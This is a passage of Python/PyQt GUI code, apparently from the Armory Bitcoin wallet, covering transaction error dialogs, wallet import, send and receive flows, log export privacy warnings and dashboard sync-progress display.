LOGERROR('Transaction was not accepted by the Satoshi client')
LOGERROR('Raw transaction:')
LOGRAWDATA(pytx.serialize(), logging.ERROR)
LOGERROR('Transaction details')
LOGPPRINT(pytx, logging.ERROR)
LOGERROR('Failure message: %s' % (errorMsg))
searchstr = binary_to_hex(txHash, BIGENDIAN)
supportURL = 'https://github.com/goatpig/BitcoinArmory/issues'
blkexplURL = BLOCKEXPLORE_URL_TX % searchstr
blkexplURL_short = BLOCKEXPLORE_URL_TX % searchstr[:20]
if not isTimeoutError:
QMessageBox.warning(self, self.tr('Transaction Not Accepted'), self.tr(
'The transaction that you just executed failed with '
'the following error message: <br><br> '
'<b>%1</b>'
'<br><br>'
'<br><br>On timeout errors, the transaction may have actually succeeded '
'and this message is displayed prematurely. To confirm whether '
'the transaction actually succeeded, you can try this direct link '
'to %2: '
'<br><br>'
'<a href="%3">%4...</a>'
'<br><br>'
'If you do not see the '
'transaction on that webpage within one minute, it failed and you '
'should attempt to re-send it. '
'If it <i>does</i> show up, then you do not need to do anything '
'else -- it will show up in Armory as soon as it receives one '
'confirmation. '
'<br><br>If the transaction did fail, it is likely because the fee '
'is too low. Try again with a higher fee. '
'If the problem persists, go to "<i>File</i>" -> '
'"<i>Export Log File</i>" and then attach it to a support '
'ticket at <a href="%5">%5</a>').arg(errorMsg, BLOCKEXPLORE_NAME, blkexplURL, \
blkexplURL_short, supportURL), QMessageBox.Ok)
else:
if errorMsgFromRPC == None:
LOGERROR('Broadcast error: %s' % errorMsg)
QMessageBox.warning(self, self.tr('Transaction Not Accepted'), self.tr(
'The transaction that you just attempted to broadcast has timed out. '
'<br><br>'
'The RPC interface of your node is disabled, therefore Armory cannot '
'use it to gather more information about the timeout. It is '
'recommended that you enable the RPC and try again.'
), QMessageBox.Ok)
else:
LOGERROR('Broadcast error: %s' % errorMsgFromRPC)
QMessageBox.warning(self, self.tr('Transaction Not Accepted'), self.tr(
'The transaction that you just attempted to broadcast has failed with '
'the following error: '
'<br><br><b>%1</b>'
).arg(errorMsgFromRPC), QMessageBox.Ok)
#############################################################################
def warnNoImportWhileScan(self):
extraMsg = ''
if not self.usermode==USERMODE.Standard:
extraMsg = ('<br><br>' + \
self.tr('In the future, you may avoid scanning twice by '
'starting Armory in offline mode (--offline), and '
'performing the import before switching to online mode.'))
QMessageBox.warning(self, self.tr('Armory is Busy'), \
self.tr('Wallets and addresses cannot be imported while Armory is in '
'the middle of an existing blockchain scan. Please wait for '
'the scan to finish. ') + extraMsg, QMessageBox.Ok)
#############################################################################
def execImportWallet(self):
sdm = TheSDM.getSDMState()
bdm = TheBDM.getState()
if sdm in ['BitcoindInitializing', \
'BitcoindSynchronizing'] or \
bdm in [BDM_SCANNING]:
QMessageBox.warning(self, self.tr('Scanning'), self.tr(
'Armory is currently in the middle of scanning the blockchain for '
'your existing wallets. New wallets cannot be imported until this '
'operation is finished.'), QMessageBox.Ok)
return
DlgUniversalRestoreSelect(self, self).exec_()
#############################################################################
def execGetImportWltName(self):
fn = self.getFileLoad('Import Wallet File')
if not os.path.exists(fn):
return
wlt = PyBtcWallet().readWalletFile(fn, verifyIntegrity=False)
wltID = wlt.uniqueIDB58
wlt = None
if self.walletMap.has_key(wltID):
QMessageBox.warning(self, self.tr('Duplicate Wallet!'), self.tr(
'You selected a wallet that has the same ID as one already '
'in your wallet (%1)! If you would like to import it anyway, '
'please delete the duplicate wallet in Armory, first.').arg(wltID), \
QMessageBox.Ok)
return
fname = self.getUniqueWalletFilename(fn)
newpath = os.path.join(ARMORY_HOME_DIR, fname)
LOGINFO('Copying imported wallet to: %s', newpath)
shutil.copy(fn, newpath)
newWlt = PyBtcWallet().readWalletFile(newpath)
newWlt.fillAddressPool()
self.addWalletToApplication(newWlt)
#############################################################################
def digitalBackupWarning(self):
reply = QMessageBox.warning(self, self.tr('Be Careful!'), self.tr(
'<font color="red"><b>WARNING:</b></font> You are about to make an '
'<u>unencrypted</u> backup of your wallet. It is highly recommended '
'that you do <u>not</u> ever save unencrypted wallets to your regular '
'hard drive. This feature is intended for saving to a USB key or '
'other removable media.'), QMessageBox.Ok | QMessageBox.Cancel)
return (reply==QMessageBox.Ok)
#############################################################################
def execAddressBook(self):
if TheBDM.getState()==BDM_SCANNING:
QMessageBox.warning(self, self.tr('Blockchain Not Ready'), self.tr(
'The address book is created from transaction data available in '
'the blockchain, which has not finished loading. The address '
'book will become available when Armory is online.'), QMessageBox.Ok)
elif TheBDM.getState() in (BDM_UNINITIALIZED,BDM_OFFLINE):
QMessageBox.warning(self, self.tr('Blockchain Not Ready'), self.tr(
'The address book is created from transaction data available in '
'the blockchain, but Armory is currently offline. The address '
'book will become available when Armory is online.'), QMessageBox.Ok)
else:
if len(self.walletMap)==0:
QMessageBox.warning(self, self.tr('No wallets!'), self.tr('You have no wallets so '
'there is no address book to display.'), QMessageBox.Ok)
return
DlgAddressBook(self, self, None, None, None).exec_()
#############################################################################
def getUniqueWalletFilename(self, wltPath):
root,fname = os.path.split(wltPath)
base,ext = os.path.splitext(fname)
if not ext=='.wallet':
fname = base+'.wallet'
currHomeList = os.listdir(ARMORY_HOME_DIR)
newIndex = 2
while fname in currHomeList:
# If we already have a wallet by this name, must adjust name
base,ext = os.path.splitext(fname)
fname='%s_%02d.wallet'%(base, newIndex)
newIndex+=1
if newIndex==99:
raise WalletExistsError('Cannot find unique filename for wallet. '
'Too many duplicates!')
return fname
#############################################################################
def addrViewDblClicked(self, index, wlt):
uacfv = lambda x: self.updateAddressCommentFromView(self.wltAddrView, self.wlt)
#############################################################################
def dblClickLedger(self, index):
if index.column()==LEDGERCOLS.Comment:
self.updateTxCommentFromView(self.ledgerView)
else:
self.showLedgerTx()
#############################################################################
def showLedgerTx(self):
row = self.ledgerView.selectedIndexes()[0].row()
txHash = str(self.ledgerView.model().index(row, LEDGERCOLS.TxHash).data().toString())
wltID = str(self.ledgerView.model().index(row, LEDGERCOLS.WltID).data().toString())
txtime = unicode(self.ledgerView.model().index(row, LEDGERCOLS.DateStr).data().toString())
pytx = None
txHashBin = hex_to_binary(txHash)
cppTx = TheBDM.bdv().getTxByHash(txHashBin)
if cppTx.isInitialized():
pytx = PyTx().unserialize(cppTx.serialize())
pytx.setRBF(cppTx.isRBF())
if pytx==None:
QMessageBox.critical(self, self.tr('Invalid Tx'), self.tr(
'The transaction you requested be displayed does not exist in '
'Armory\'s database. This is unusual...'), QMessageBox.Ok)
return
DlgDispTxInfo( pytx, self.walletMap[wltID], self, self, txtime=txtime).exec_()
#############################################################################
def showContextMenuLedger(self):
menu = QMenu(self.ledgerView)
if len(self.ledgerView.selectedIndexes())==0:
return
row = self.ledgerView.selectedIndexes()[0].row()
wltID = str(self.ledgerView.model().index(row, LEDGERCOLS.WltID).data().toString())
txHash = str(self.ledgerView.model().index(row, LEDGERCOLS.TxHash).data().toString())
txHash = hex_switchEndian(txHash)
amount, flag = self.ledgerView.model().index(row, LEDGERCOLS.Amount).data().toFloat()
rbf = self.ledgerView.model().index(row, LEDGERCOLS.optInRBF).data().toBool()
issts = self.ledgerView.model().index(row, LEDGERCOLS.toSelf).data().toBool()
flagged = rbf and (amount < 0 or issts)
if flagged:
actBump = menu.addAction(self.tr("Bump Fee"))
actViewTx = menu.addAction(self.tr("View Details"))
actViewBlkChn = menu.addAction(self.tr("View on %1").arg(BLOCKEXPLORE_NAME))
actComment = menu.addAction(self.tr("Change Comment"))
actCopyTxID = menu.addAction(self.tr("Copy Transaction ID"))
actOpenWallet = menu.addAction(self.tr("Open Relevant Wallet"))
action = menu.exec_(QCursor.pos())
if action==actViewTx:
self.showLedgerTx()
elif action==actViewBlkChn:
try:
DlgBrowserWarn(BLOCKEXPLORE_URL_TX % txHash).exec_()
except:
LOGEXCEPT('Failed to open webbrowser')
QMessageBox.critical(self, self.tr('Could not open browser'), self.tr(
'Armory encountered an error opening your web browser. To view '
'this transaction on blockchain.info, please copy and paste '
'the following URL into your browser: '
'<br><br>%1').arg(BLOCKEXPLORE_URL_TX % txHash), QMessageBox.Ok)
elif action==actCopyTxID:
clipb = QApplication.clipboard()
clipb.clear()
clipb.setText(txHash)
elif action==actComment:
self.updateTxCommentFromView(self.ledgerView)
elif action==actOpenWallet:
DlgWalletDetails(self.getSelectedWallet(), self.usermode, self, self).exec_()
elif flagged and action==actBump:
txHash = hex_switchEndian(txHash)
self.bumpFee(wltID, txHash)
#############################################################################
def getSelectedWallet(self):
wltID = None
if len(self.walletMap) > 0:
wltID = self.walletMap.keys()[0]
wltSelect = self.walletsView.selectedIndexes()
if len(wltSelect) > 0:
row = wltSelect[0].row()
wltID = str(self.walletsView.model().index(row, WLTVIEWCOLS.ID).data().toString())
# Starting the send dialog with or without a wallet
return None if wltID == None else self.walletMap[wltID]
def clickSendBitcoins(self):
if TheBDM.getState() in (BDM_OFFLINE, BDM_UNINITIALIZED):
QMessageBox.warning(self, self.tr('Offline Mode'), self.tr(
'Armory is currently running in offline mode, and has no '
'ability to determine balances or create transactions. '
'<br><br>'
'In order to send coins from this wallet you must use a '
'full copy of this wallet from an online computer, '
'or initiate an "offline transaction" using a watching-only '
'wallet on an online computer.'), QMessageBox.Ok)
return
elif TheBDM.getState()==BDM_SCANNING:
QMessageBox.warning(self, self.tr('Armory Not Ready'), self.tr(
'Armory is currently scanning the blockchain to collect '
'the information needed to create transactions. This typically '
'takes between one and five minutes. Please wait until your '
'balance appears on the main window, then try again.'), \
QMessageBox.Ok)
return
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'), self.tr(
'You cannot send any bitcoins until you create a wallet and '
'receive some coins. Would you like to create a wallet?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
else:
DlgSendBitcoins(self.getSelectedWallet(), self, self).exec_()
#############################################################################
def uriSendBitcoins(self, uriDict):
# Because Bitcoin Core doesn't store the message= field we have to assume
# that the label field holds the Tx-info. So we concatenate them for
# the display message
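# Illustrative example (hypothetical URI values):
#   uriDict = {'address': '1ExampleAddr...', 'amount': 50000000,
#              'label': 'Donation', 'message': 'Thanks!'}
#   -> the display message becomes "Donation: Thanks!" and the amount is
#      shown as 0.5 BTC (coin2str of 50000000 satoshis)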
uri_has = lambda s: uriDict.has_key(s)
haveLbl = uri_has('label')
haveMsg = uri_has('message')
newMsg = ''
if haveLbl and haveMsg:
newMsg = uriDict['label'] + ': ' + uriDict['message']
elif not haveLbl and haveMsg:
newMsg = uriDict['message']
elif haveLbl and not haveMsg:
newMsg = uriDict['label']
descrStr = self.tr('You just clicked on a "bitcoin:" link requesting bitcoins '
'to be sent to the following address:<br> ')
descrStr += self.tr('<br>--<b>Address</b>:\t%1 ').arg(uriDict['address'])
#if uri_has('label'):
#if len(uriDict['label'])>30:
#descrStr += '(%s...)' % uriDict['label'][:30]
#else:
#descrStr += '(%s)' % uriDict['label']
amt = 0
if uri_has('amount'):
amt = uriDict['amount']
amtstr = coin2str(amt, maxZeros=1)
descrStr += self.tr('<br>--<b>Amount</b>:\t%1 BTC').arg(amtstr)
if newMsg:
if len(newMsg)>60:
descrStr += self.tr('<br>--<b>Message</b>:\t%1...').arg(newMsg[:60])
else:
descrStr += self.tr('<br>--<b>Message</b>:\t%1').arg(newMsg)
uriDict['message'] = newMsg
if not uri_has('amount'):
descrStr += (self.tr('<br><br>There is no amount specified in the link, so '
'you can decide the amount after selecting a wallet to use '
'for this transaction. '))
else:
descrStr += self.tr('<br><br><b>The specified amount <u>can</u> be changed</b> on the '
'next screen before hitting the "Send" button. ')
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'), self.tr(
'You just clicked on a "bitcoin:" link to send money, but you '
'currently have no wallets! Would you like to create a wallet '
'now?'), QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return False
else:
dlg = DlgSendBitcoins(self.getSelectedWallet(), self, self)
dlg.frame.prefillFromURI(uriDict)
dlg.exec_()
return True
#############################################################################
def clickReceiveCoins(self):
loading = None
QAPP.processEvents()
wltID = None
selectionMade = True
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'), self.tr(
'You have not created any wallets which means there is '
'nowhere to store your bitcoins! Would you like to '
'create a wallet now?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return
elif len(self.walletMap)==1:
loading = LoadingDisp(self, self)
loading.show()
wltID = self.walletMap.keys()[0]
else:
wltSelect = self.walletsView.selectedIndexes()
if len(wltSelect)>0:
row = wltSelect[0].row()
wltID = str(self.walletsView.model().index(row, WLTVIEWCOLS.ID).data().toString())
dlg = DlgWalletSelect(self, self, self.tr('Receive coins with wallet...'), '', \
firstSelect=wltID, onlyMyWallets=False)
if dlg.exec_():
loading = LoadingDisp(self, self)
loading.show()
wltID = dlg.selectedID
else:
selectionMade = False
if selectionMade:
wlt = self.walletMap[wltID]
wlttype = determineWalletType(wlt, self)[0]
if showRecvCoinsWarningIfNecessary(wlt, self, self):
QAPP.processEvents()
dlg = DlgNewAddressDisp(wlt, self, self, loading)
dlg.exec_()
#############################################################################
def sysTrayActivated(self, reason):
if reason==QSystemTrayIcon.DoubleClick:
self.bringArmoryToFront()
#############################################################################
def bringArmoryToFront(self):
self.show()
self.setWindowState(Qt.WindowActive)
self.activateWindow()
self.raise_()
#############################################################################
def minimizeArmory(self):
LOGDEBUG('Minimizing Armory')
self.hide()
self.sysTray.show()
#############################################################################
def startWalletWizard(self):
walletWizard = WalletWizard(self, self)
walletWizard.exec_()
#############################################################################
def startTxWizard(self, prefill=None, onlyOfflineWallets=False):
txWizard = TxWizard(self, self, self.getSelectedWallet(), prefill, onlyOfflineWallets=onlyOfflineWallets)
txWizard.exec_()
#############################################################################
def exportLogFile(self):
LOGDEBUG('exportLogFile')
if self.logFilePrivacyWarning(wCancel=True):
self.saveCombinedLogFile()
#############################################################################
def logFileTriplePrivacyWarning(self):
return MsgBoxCustom(MSGBOX.Warning, self.tr('Privacy Warning'), self.tr(
'<b><u><font size=3>Wallet Analysis Log Files</font></u></b> '
'<br><br> '
'The wallet analysis logs contain no personally-identifiable '
'information, only a record of errors and inconsistencies '
'found in your wallet file. No private keys or even public '
'keys are included. '
'<br><br>'
'<b><u><font size=3>Regular Log Files</font></u></b>'
'<br><br>'
'The regular log files do not contain any <u>security</u>-sensitive '
'information, but some users may consider the information to be '
'<u>privacy</u>-sensitive. The log files may identify some addresses '
'and transactions that are related to your wallets. It is always '
'recommended you include your log files with any request to the '
'Armory team, unless you are uncomfortable with the privacy '
'implications. '
'<br><br>'
'<b><u><font size=3>Watching-only Wallet</font></u></b> '
'<br><br>'
'A watching-only wallet is a copy of a regular wallet that does not '
'contain any signing keys. This allows the holder to see the balance '
'and transaction history of the wallet, but not spend any of the funds. '
'<br><br> '
'You may be requested to submit a watching-only copy of your wallet '
'to make sure that there is no '
'risk to the security of your funds. You should not even consider '
'sending your '
'watching-only wallet unless it was specifically requested by an '
'Armory representative.'), yesStr="&Ok")
#############################################################################
def logFilePrivacyWarning(self, wCancel=False):
return MsgBoxCustom(MSGBOX.Warning, self.tr('Privacy Warning'), self.tr(
'Armory log files do not contain any <u>security</u>-sensitive '
'information, but some users may consider the information to be '
'<u>privacy</u>-sensitive. The log files may identify some addresses '
'and transactions that are related to your wallets. '
'<br><br> '
'<b>No signing-key data is ever written to the log file</b>. '
'Only enough data is there to help the Armory developers '
'track down bugs in the software, but it may still be considered '
'sensitive information to some users. '
'<br><br>'
'Please do not send the log file to the Armory developers if you '
'are not comfortable with the privacy implications! However, if you '
'do not send the log file, it may be very difficult or impossible '
'for us to help you with your problem.'), wCancel=wCancel, yesStr="&Ok")
#############################################################################
def saveCombinedLogFile(self, saveFile=None):
if saveFile is None:
# TODO: Interleave the C++ log and the python log.
# That could be a lot of work!
defaultFN = 'armorylog_%s.txt' % \
unixTimeToFormatStr(RightNow(),'%Y%m%d_%H%M')
saveFile = self.getFileSave(title='Export Log File', \
ffilter=['Text Files (*.txt)'], \
defaultFilename=defaultFN)
if len(unicode(saveFile)) > 0:
fout = open(saveFile, 'wb')
fout.write(getLastBytesOfFile(ARMORY_LOG_FILE, 256*1024))
fout.write(getLastBytesOfFile(ARMCPP_LOG_FILE, 256*1024))
fout.write(getLastBytesOfFile(ARMDB_LOG_FILE, 256*1024))
fout.close()
LOGINFO('Log saved to %s', saveFile)
#############################################################################
def blinkTaskbar(self):
self.activateWindow()
#############################################################################
def lookForBitcoind(self):
LOGDEBUG('lookForBitcoind')
if TheSDM.satoshiIsAvailable():
return 'Running'
self.setSatoshiPaths()
try:
TheSDM.setupSDM(extraExeSearch=self.satoshiExeSearchPath)
except:
LOGEXCEPT('Error setting up SDM')
pass
if TheSDM.failedFindExe:
return 'StillMissing'
return 'AllGood'
#############################################################################
def executeModeSwitch(self):
LOGDEBUG('executeModeSwitch')
if TheSDM.getSDMState() == 'BitcoindExeMissing':
bitcoindStat = self.lookForBitcoind()
if bitcoindStat=='Running':
result = QMessageBox.warning(self, self.tr('Already running!'), self.tr(
'The Bitcoin software appears to be installed now, but it '
'needs to be closed for Armory to work. Would you like Armory '
'to close it for you?'), QMessageBox.Yes | QMessageBox.No)
if result==QMessageBox.Yes:
self.closeExistingBitcoin()
self.startBitcoindIfNecessary()
elif bitcoindStat=='StillMissing':
QMessageBox.warning(self, self.tr('Still Missing'), self.tr(
'The Bitcoin software still appears to be missing. If you '
'just installed it, then please adjust your settings to point '
'to the installation directory.'), QMessageBox.Ok)
self.startBitcoindIfNecessary()
elif self.doAutoBitcoind and not TheSDM.isRunningBitcoind():
if TheSDM.satoshiIsAvailable():
result = QMessageBox.warning(self, self.tr('Still Running'), self.tr(
'Bitcoin Core is still running. Armory cannot start until '
'it is closed. Do you want Armory to close it for you?'), \
QMessageBox.Yes | QMessageBox.No)
if result==QMessageBox.Yes:
self.closeExistingBitcoin()
self.startBitcoindIfNecessary()
else:
self.startBitcoindIfNecessary()
elif TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
try:
TheBDM.goOnline()
self.switchNetworkMode(NETWORKMODE.Full)
except Cpp.NoArmoryDBExcept:
self.switchNetworkMode(NETWORKMODE.Offline)
else:
LOGERROR('ModeSwitch button pressed when it should be disabled')
time.sleep(0.3)
self.setDashboardDetails()
#############################################################################
def setupDashboard(self):
LOGDEBUG('setupDashboard')
self.lblBusy = QLabel('')
self.btnModeSwitch = QPushButton('')
self.connect(self.btnModeSwitch, SIGNAL('clicked()'), \
self.executeModeSwitch)
# Will switch this to array/matrix of widgets if I get more than 2 rows
self.lblDashModeSync = QRichLabel('',doWrap=False)
self.lblDashModeSync.setText( self.tr('Node Status'), \
size=4, bold=True, color='Foreground')
self.lblDashModeBuild = QRichLabel('',doWrap=False)
self.lblDashModeScan = QRichLabel('',doWrap=False)
self.lblDashModeSync.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeBuild.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeScan.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.barProgressSync = QProgressBar(self)
self.barProgressBuild = QProgressBar(self)
self.barProgressScan = QProgressBar(self)
self.barProgressSync.setRange(0,100)
self.barProgressScan.setRange(0,100)
twid = relaxedSizeStr(self,'99 seconds')[0]
self.lblTimeLeftSync = QRichLabel('')
self.lblTimeLeftBuild = QRichLabel('')
self.lblTimeLeftScan = QRichLabel('')
self.lblTimeLeftSync.setMinimumWidth(twid)
self.lblTimeLeftScan.setMinimumWidth(twid)
layoutDashMode = QGridLayout()
layoutDashMode.addWidget(self.lblDashModeSync, 2,0)
layoutDashMode.addWidget(self.barProgressSync, 2,1)
layoutDashMode.addWidget(self.lblTimeLeftSync, 2,2)
layoutDashMode.addWidget(self.lblDashModeBuild, 3,0)
layoutDashMode.addWidget(self.barProgressBuild, 3,1)
layoutDashMode.addWidget(self.lblTimeLeftBuild, 3,2)
layoutDashMode.addWidget(self.lblDashModeScan, 4,0)
layoutDashMode.addWidget(self.barProgressScan, 4,1)
layoutDashMode.addWidget(self.lblTimeLeftScan, 4,2)
layoutDashMode.addWidget(self.lblBusy, 0,3, 5,1)
layoutDashMode.addWidget(self.btnModeSwitch, 0,3, 5,1)
self.frmDashModeSub = QFrame()
self.frmDashModeSub.setFrameStyle(STYLE_SUNKEN)
self.frmDashModeSub.setLayout(layoutDashMode)
self.frmDashMode = makeHorizFrame(['Stretch', \
self.frmDashModeSub, \
'Stretch'])
self.lblDashDescr1 = QRichLabel('')
self.lblDashDescr2 = QRichLabel('')
for lbl in [self.lblDashDescr1, self.lblDashDescr2]:
# One textbox above buttons, one below
lbl.setStyleSheet('padding: 5px')
qpal = lbl.palette()
qpal.setColor(QPalette.Base, Colors.Background)
lbl.setPalette(qpal)
lbl.setOpenExternalLinks(True)
# Set up an array of buttons in the middle of the dashboard, to be used
# to help the user install bitcoind.
self.lblDashBtnDescr = QRichLabel('')
self.lblDashBtnDescr.setOpenExternalLinks(True)
BTN,LBL,TTIP = range(3)
self.dashBtns = [[None]*3 for i in range(3)]
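# dashBtns is a 3x3 grid: one row per DASHBTNS entry (Close, Browse,
# Settings) and one column each for the button (BTN), its description
# label (LBL), and its tooltip widget (TTIP)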
self.dashBtns[DASHBTNS.Close ][BTN] = QPushButton(self.tr('Close Bitcoin Process'))
self.dashBtns[DASHBTNS.Browse ][BTN] = QPushButton(self.tr('Open https://bitcoin.org'))
self.dashBtns[DASHBTNS.Settings][BTN] = QPushButton(self.tr('Change Settings'))
# The "Now shutting down" frame
self.lblShuttingDown = QRichLabel('', doWrap=False)
self.lblShuttingDown.setText(self.tr('Preparing to shut down...'), \
size=4, bold=True, color='Foreground')
self.lblShuttingDown.setAlignment(Qt.AlignCenter | Qt.AlignVCenter)
layoutDashExit = QGridLayout()
layoutDashExit.addWidget(self.lblShuttingDown, 0,0, 0, 1)
self.frmDashSubExit = QFrame()
self.frmDashSubExit.setFrameStyle(STYLE_SUNKEN)
self.frmDashSubExit.setLayout(layoutDashExit)
self.frmDashSubExit = makeHorizFrame(['Stretch', \
self.frmDashSubExit, \
'Stretch'])
#####
def openBitcoinOrg():
DlgBrowserWarn('https://bitcoin.org/en/download').exec_()
self.connect(self.dashBtns[DASHBTNS.Close][BTN], SIGNAL('clicked()'), \
self.closeExistingBitcoin)
self.connect(self.dashBtns[DASHBTNS.Browse][BTN], SIGNAL('clicked()'), \
openBitcoinOrg)
self.connect(self.dashBtns[DASHBTNS.Settings][BTN], SIGNAL('clicked()'), \
self.openSettings)
self.dashBtns[DASHBTNS.Close][LBL] = QRichLabel( \
self.tr('Stop existing Bitcoin processes so that Armory can open its own'))
self.dashBtns[DASHBTNS.Browse][LBL] = QRichLabel( \
self.tr('Open browser to Bitcoin webpage to download and install Bitcoin software'))
self.dashBtns[DASHBTNS.Settings][LBL] = QRichLabel( \
self.tr('Open Armory settings window to change Bitcoin software management'))
self.dashBtns[DASHBTNS.Browse][TTIP] = self.createToolTipWidget( self.tr(
'Will open your default browser to https://bitcoin.org where you can '
'download the latest version of Bitcoin Core, and get other information '
'and links about Bitcoin, in general.'))
self.dashBtns[DASHBTNS.Settings][TTIP] = self.createToolTipWidget( self.tr(
'Change Bitcoin Core/bitcoind management settings or point Armory to '
'a non-standard Bitcoin installation'))
self.dashBtns[DASHBTNS.Close][TTIP] = self.createToolTipWidget( self.tr(
'Armory has detected a running Bitcoin Core or bitcoind instance and '
'will force it to exit'))
self.frmDashMgmtButtons = QFrame()
self.frmDashMgmtButtons.setFrameStyle(STYLE_SUNKEN)
layoutButtons = QGridLayout()
layoutButtons.addWidget(self.lblDashBtnDescr, 0,0, 1,3)
for r in range(3):
for c in range(3):
if c==LBL:
wMin = tightSizeNChar(self, 50)[0]
self.dashBtns[r][c].setMinimumWidth(wMin)
layoutButtons.addWidget(self.dashBtns[r][c], r+1,c)
self.frmDashMgmtButtons.setLayout(layoutButtons)
self.frmDashMidButtons = makeHorizFrame(['Stretch', \
self.frmDashMgmtButtons,
'Stretch'])
dashLayout = QVBoxLayout()
dashLayout.addWidget(self.frmDashSubExit)
dashLayout.addWidget(self.frmDashMode)
dashLayout.addWidget(self.lblDashDescr1)
dashLayout.addWidget(self.frmDashMidButtons )
dashLayout.addWidget(self.lblDashDescr2)
frmInner = QFrame()
frmInner.setLayout(dashLayout)
self.dashScrollArea = QScrollArea()
self.dashScrollArea.setWidgetResizable(True)
self.dashScrollArea.setWidget(frmInner)
scrollLayout = QVBoxLayout()
scrollLayout.addWidget(self.dashScrollArea)
self.tabDashboard.setLayout(scrollLayout)
self.frmDashSubExit.setVisible(False)
#############################################################################
def closeExistingBitcoin(self):
for proc in psutil.process_iter():
try:
if proc.name().lower() in ['bitcoind.exe','bitcoin-qt.exe',\
'bitcoind','bitcoin-qt']:
killProcess(proc.pid)
time.sleep(2)
return
# If the block above raises AccessDenied or anything else, just skip it
except:
pass
# If got here, never found it
QMessageBox.warning(self, self.tr('Not Found'), self.tr(
'Attempted to kill the running Bitcoin Core/bitcoind instance, '
'but it was not found.'), QMessageBox.Ok)
#############################################################################
def getPercentageFinished(self, maxblk, lastblk):
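# Progress is estimated from cumulative blockchain *size* rather than raw
# block count, since block sizes vary widely over the chain's history
# (a rough heuristic based on EstimateCumulativeBlockchainSize below)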
curr = EstimateCumulativeBlockchainSize(lastblk)
maxb = EstimateCumulativeBlockchainSize(maxblk)
return float(curr)/float(maxb)
#############################################################################
def showShuttingDownMessage(self):
self.isShuttingDown = True
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
self.frmDashSubExit.setVisible(True)
self.frmDashMode.setVisible(False)
self.lblDashDescr1.setVisible(False)
self.frmDashMidButtons.setVisible(False)
self.lblDashDescr2.setVisible(False)
#############################################################################
def updateSyncProgress(self):
if self.isShuttingDown:
return
sdmState = TheSDM.getSDMState()
sdmStr = TheSDM.getSDMStateStr()
if TheBDM.getState()==BDM_SCANNING:
self.lblDashModeSync.setVisible(False)
self.barProgressSync.setVisible(False)
self.lblTimeLeftSync.setVisible(False)
self.lblDashModeSync.setVisible(self.doAutoBitcoind)
self.barProgressSync.setVisible(self.doAutoBitcoind)
self.barProgressSync.setValue(100)
self.lblTimeLeftSync.setVisible(False)
self.barProgressSync.setFormat('')
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.lblTimeLeftBuild.setVisible(True)
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(False)
phase,pct,tleft,numericProgress = TheBDM.predictLoadTime()
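# As used below: phase is the current BDM phase constant, pct is a 0-1
# completion fraction, tleft is the estimated seconds remaining
# (2**32 - 1 meaning "unknown"), and numericProgress is unused here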
if phase==Cpp.BDMPhase_DBHeaders:
self.lblDashModeBuild.setText( self.tr('Loading Database Headers'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_OrganizingChain:
self.lblDashModeBuild.setText( self.tr('Organizing Blockchain'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
self.barProgressBuild.setValue(0)
self.barProgressBuild.setRange(0,0)
self.lblTimeLeftBuild.setVisible(False)
self.lblTimeLeftScan.setVisible(False)
elif phase==Cpp.BDMPhase_BlockHeaders:
self.lblDashModeBuild.setText( self.tr('Reading New Block Headers'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_BlockData:
self.lblDashModeBuild.setText( self.tr('Building Databases'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_Rescan:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Scanning Transaction History'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.barProgressScan.setFormat('%p%')
elif phase==Cpp.BDMPhase_Balance:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Computing Balances'), \
size=4, bold=True, color='Foreground')
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
self.barProgressBuild.setValue(0)
self.barProgressBuild.setRange(0,0)
self.lblTimeLeftBuild.setVisible(False)
elif phase==Cpp.BDMPhase_SearchHashes:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Parsing Tx Hashes'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.lblTimeLeftScan.setVisible(False)
self.barProgressScan.setFormat('')
self.barProgressScan.setValue(0)
self.barProgressScan.setRange(0,0)
self.lblTimeLeftScan.setVisible(False)
